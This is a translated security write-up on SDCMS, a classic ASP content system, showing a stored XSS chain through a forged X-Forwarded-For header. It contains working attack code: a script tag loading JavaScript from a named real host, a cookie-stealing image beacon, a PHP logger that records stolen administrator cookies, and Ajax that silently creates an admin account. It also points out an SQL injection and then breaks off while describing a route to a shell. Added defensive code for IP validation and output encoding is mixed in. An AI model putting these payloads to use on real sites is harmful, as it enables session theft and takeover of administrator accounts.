Author: Amxking
Vulnerability Analysis:
Let's take a look at the following code:
(Note: this method only works when the administrator has enabled comments, which is normally the case.)
In /plug/comment.asp:
Sub save_comment
......
    username = sdcms_f.HTMLEncode(username)
    content = sdcms_f.contentEncode(content)
    ip = sdcms_f.getip    ' Note this call: the IP address is obtained here.
    Set rs = server.CreateObject("adodb.recordset")
    sql = "select username,content,ip,infoid,ispass from sd_comment"
    rs.open sql, conn, 1, 3
    rs.addnew
    rs(0) = left(username, 10)
    rs(1) = content
    rs(2) = ip    ' No filtering: the value is inserted into the database as-is.
    rs(3) = id
    If sdcms_comment_ispass = 1 Then
        msg_contents = ", please wait for review"
        rs(4) = 0
    Else
        rs(4) = 1
    End If
    rs.update
......
End Sub
Now look at the implementation of getip, in /inc/function.asp:
Public Function getip
    ip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
    If ip = "" Then ip = Request.ServerVariables("REMOTE_ADDR")
    getip = ip
End Function
The problem is obvious: the author reads the IP value from the HTTP_X_FORWARDED_FOR header, and that header can be set to anything in the request.
We can forge the request, put a one-line trojan in HTTP_X_FORWARDED_FOR and submit it; the one-liner is then written straight into the database. If we knew the database location and it had an .asp extension, we could use it directly.
Unfortunately the name of this CMS's database is not known: at installation time 12 random characters are generated by the code below, and the extension stays .mdb. So even though we can insert a one-liner, it cannot be used this way.
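The defensive counterpart to getip above, as an added example (this is not SDCMS code and not part of the original article): the forwarded-for header is only consulted when the request actually arrived through a reverse proxy the application knows about, the chain is walked from the right so client-supplied entries are never reached, and every value is validated as an address literal before it can be stored. The header/peer inputs and the trusted proxy list are assumptions of this example; the sample requests in demo() are constructed, not captured traffic.

```javascript
// Added example (not SDCMS code): resolve a client address that is safe to store.
// Assumptions: `headers` is a plain object with lower-case header names,
// `remoteAddr` is the TCP peer address (what REMOTE_ADDR holds), and
// `trustedProxies` lists the reverse proxies this server actually sits behind.
// IPv4 only, to keep the validator explicit (see the note below for IPv6).

const IPV4 = /^(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}$/;

function isIpv4(s) {
  return typeof s === "string" && IPV4.test(s);
}

function clientIp(headers, remoteAddr, trustedProxies) {
  if (!isIpv4(remoteAddr)) throw new Error("peer address is not an IPv4 literal");
  // Not behind a trusted proxy: the header was written by the client, so ignore it.
  if (!trustedProxies.includes(remoteAddr)) return remoteAddr;
  const raw = headers["x-forwarded-for"] || "";
  const hops = raw.split(",").map(h => h.trim()).filter(h => h.length > 0);
  // Each trusted proxy appends the address it saw, so walk from the right: the
  // first hop that is not one of our proxies is the client. Anything further
  // left was supplied by the client itself and is never trusted.
  let candidate = remoteAddr;
  for (let i = hops.length - 1; i >= 0; i--) {
    if (!isIpv4(hops[i])) break;   // payload or malformed entry: keep the last good address
    candidate = hops[i];
    if (!trustedProxies.includes(candidate)) break;
  }
  return candidate;
}

// Constructed requests (not captured traffic) covering the cases that matter.
function demo() {
  const proxies = ["10.0.0.2"];
  const payload = "<script src=http://attacker.example/test.js></script>";
  return {
    // client talks to us directly and sends a header: header ignored
    direct: clientIp({ "x-forwarded-for": payload }, "203.0.113.5", proxies),
    // normal request through our proxy
    proxied: clientIp({ "x-forwarded-for": "198.51.100.7" }, "10.0.0.2", proxies),
    // client sent a payload, proxy appended the real peer address after it
    forged: clientIp({ "x-forwarded-for": payload + ", 198.51.100.7" }, "10.0.0.2", proxies),
    // proxy that forwards the header without appending: fall back to the peer
    bare: clientIp({ "x-forwarded-for": payload }, "10.0.0.2", proxies),
  };
}
```

The stored value is therefore always an address literal, which also makes the 50-character ip column a non-issue. In a Node.js deployment `net.isIP()` is the standard replacement for the IPv4 regex when IPv6 clients must be accepted.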
/install/index.asp
Function get_something
    Randomize
    Do While Len(pass) < 12    ' 12 random characters
        num1 = CStr(Chr((57-48)*rnd + 48))     ' 0~9
        num2 = CStr(Chr((90-65)*rnd + 65))     ' A~Z
        num3 = CStr(Chr((122-97)*rnd + 97))    ' a~z
        pass = pass & num1 & num2 & num3
    Loop
    get_something = pass
End Function
So we turn to a different approach. Look at the following code:
/admin/sdcms_comment.asp
Sub main
    echo "<form name=""add"" action=""?"" method=""post"" onSubmit=""return confirm('Are you sure you want to perform the selected operation?');"">"
    page = request.querystring("page")
    If page = "" Or Not IsNumeric(page) Then
        page = 1
    End If
    pages = 20
    Set rs = server.CreateObject("adodb.recordset")
    If request("classid") <> 0 Then tj = " where infoid=" & request("classid")    ' injection point, see below
    sql = "select id,username,"
    If is_sql = 0 Then
        sql = sql & "(iif(ispass=1,'reviewed','not reviewed'))"
    Else
        sql = sql & "(case ispass when 1 then 'reviewed' else 'not reviewed' end)"
    End If
    sql = sql & ",ip,adddate,content,ispass,infoid from " & sd_table & tj & " order by ispass,id desc"
    ' The IP value is read back by this query and displayed by the markup below without any filtering.
The tj line has an injection vulnerability: although classid = sdcms.requestint("classid") is used earlier to obtain an integer, the SQL is built from request("classid") directly rather than from classid, and that value is not filtered, so it can be injected. Exploiting it requires administrator privileges, however, so it is not discussed further here.
The IP address is then rendered by the following template:
<td class="title_bg" style="text-align:left"><span style="float:right"><% if rs(6)=0 then %><a href="?action=pass&id=<%=rs(0)%>&t=1&classid=<%=classid%>">Verification passed</a><% else %><a href="?action=pass&id=<%=rs(0)%>&t=0&classid=<%=classid%>">Cancel verification</a><% end if %> <a href="?action=del&id=<%=rs(0)%>&classid=<%=classid%>" onclick="return confirm('Are you sure you want to delete it? It cannot be recovered!');">Delete</a></span><input name="id" type="checkbox" onClick="unselectall()" value="<%=rs(0)%>"><%=rs(1)%> published on: <%=rs(4)%> IP: <%=rs(3)%></td>
So we turn to XSS: malicious JavaScript that executes when the administrator views and reviews the comments.
XSS itself is not explained here. We set HTTP_X_FORWARDED_FOR to <script src=http://www.xuehi.com/test.js></script> (the malicious JavaScript goes in test.js) and submit.
How the request is submitted is not laboured here: capture a packet with nc and resend it, use a ready-made tool, or write your own program.
Note that the ip field in the database is 50 characters long by default, so the payload has to fit within that length.
In this CMS the cookie consists of 12 characters set by the author, the administrator's username, and the MD5 of the password,
so once we have the cookie we essentially have back-end access.
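Two defensive pieces for the admin comment listing shown above, as an added example that is not SDCMS code and not part of the article: the output-side fix (encode every untrusted field when it is written into the page, so a stored value like the script tag is rendered as text), and a detection sweep over stored comment rows that flags ip values which are not address literals, which is exactly what the unfiltered getip path leaves behind. The row shape and the sample rows are constructed for this example.

```javascript
// Added example (not SDCMS code). Row shape {id, username, adddate, ip} is an
// assumption mirroring the columns the admin page reads from sd_comment.

// HTML-encode a value for both element text and quoted attribute contexts.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Render one row of the review list the way the admin template does, but with
// every database-sourced field encoded at the point of output.
function renderCommentRow(row) {
  return `<td class="title_bg">` +
    `<input name="id" type="checkbox" value="${htmlEncode(row.id)}">` +
    `${htmlEncode(row.username)} published on: ${htmlEncode(row.adddate)} ` +
    `IP: ${htmlEncode(row.ip)}</td>`;
}

// Only characters that can appear in an IPv4/IPv6 literal; anything else in the
// ip column is noise or a payload that arrived through X-Forwarded-For.
const IP_CHARS = /^[0-9A-Fa-f.:]{1,45}$/;

// Detection sweep: return the rows whose stored ip is not an address literal.
function findSuspiciousIps(rows) {
  return rows
    .filter(r => !IP_CHARS.test(String(r.ip)))
    .map(r => ({ id: r.id, ip: r.ip, reason: "ip column is not an address literal" }));
}

// Constructed sample rows (not real data): one clean IPv4, one stored payload, one IPv6.
const SAMPLE_ROWS = [
  { id: 1, username: "alice", adddate: "2009-01-01 10:00", ip: "203.0.113.5" },
  { id: 2, username: "bob",   adddate: "2009-01-01 10:05", ip: "<script src=http://attacker.example/test.js></script>" },
  { id: 3, username: "carol", adddate: "2009-01-01 10:09", ip: "2001:db8::1" },
];

function sweep() {
  return { flagged: findSuspiciousIps(SAMPLE_ROWS), html: SAMPLE_ROWS.map(renderCommentRow) };
}
```

Encoding at output is the fix that holds even for rows that were stored before input validation existed; the sweep is what tells you whether such rows are already present.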
Now for test.js. If it contained only
    alert(document.cookie)
the administrator's cookie would pop up in an alert during review. Of course that is not how it would be used: the cookie has to be sent to a remote server, and the following code should look familiar.
test.js:
    var img = new Image();
    img.src = "http://www.xuehi.com/test.php?cookie=" + document.cookie;
test.php:
    <?php
    fputs(fopen('a.txt', 'a+'), $_GET['cookie'] . '//');
    ?>
When the administrator views the comments, a.txt is created on our server containing the administrator's cookie. With the cookie we have the administrator's identity: go to the back end and replace the cookie. Alternatively, Ajax can make the administrator's browser add an account, as follows:
    function getXHR() {
        var xhr = null;
        if (window.XMLHttpRequest) {
            xhr = new XMLHttpRequest();
        } else if (window.createRequest) {
            xhr = window.createRequest();
        } else if (window.ActiveXObject) {
            try {
                xhr = new ActiveXObject("Msxml2.XMLHTTP");
            } catch (e) {
                try {
                    xhr = new ActiveXObject("Microsoft.XMLHTTP");
                } catch (e) {}
            }
        }
        return xhr;
    }
    var ajax = getXHR();
    ajax.open("POST", "/admin/sdcms_admin.asp?action=save&act=add", false);
    ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    ajax.send("t0=test&t1=test&t2=1");
After the administrator views the comments, an account is added automatically.
I covered this in earlier articles, so I will not go into detail here.
Next, how to obtain a shell. Look at the code that writes the configuration in the back end,
in /admin/sdcms_set.asp:
Set fso = server.CreateObject("scripting.filesystemobject")
Set info = fso.CreateTextFile(Server.mappath("../inc/const.asp"), true)
info.write "<" & "%" & vbcrlf
......
info.write "%" & ">"
info.close
Set info = nothing
Set fso = nothing
The configuration file is written to /inc/const.asp. In the save routine:
Sub save
    t0 = clear_bad(trim(request("t0")))
    t1 = clear_bad(trim(request("t1")))
    t2 = clear_bad(trim(request("t2")))
    t3 = clear_bad(trim(request("t3")))
    t4 = clear_bad(trim(request("t4")))
    t5 = clear_bad(trim(request("t5")))
    t6 = clear_bad(trim(request("t6")))
    t7 = clear_bad(trim(request("t7")))
    t8 = clear_bad(trim(request("t8")))
    t9 = clear_bad(trim(request("t9")))
    t10 = clear_bad(trim(request("t10")))
    t11 = clear_bad(trim(request("t11")))
    t12 = clear_bad(trim(request("t12")))
    t13 = trim(requ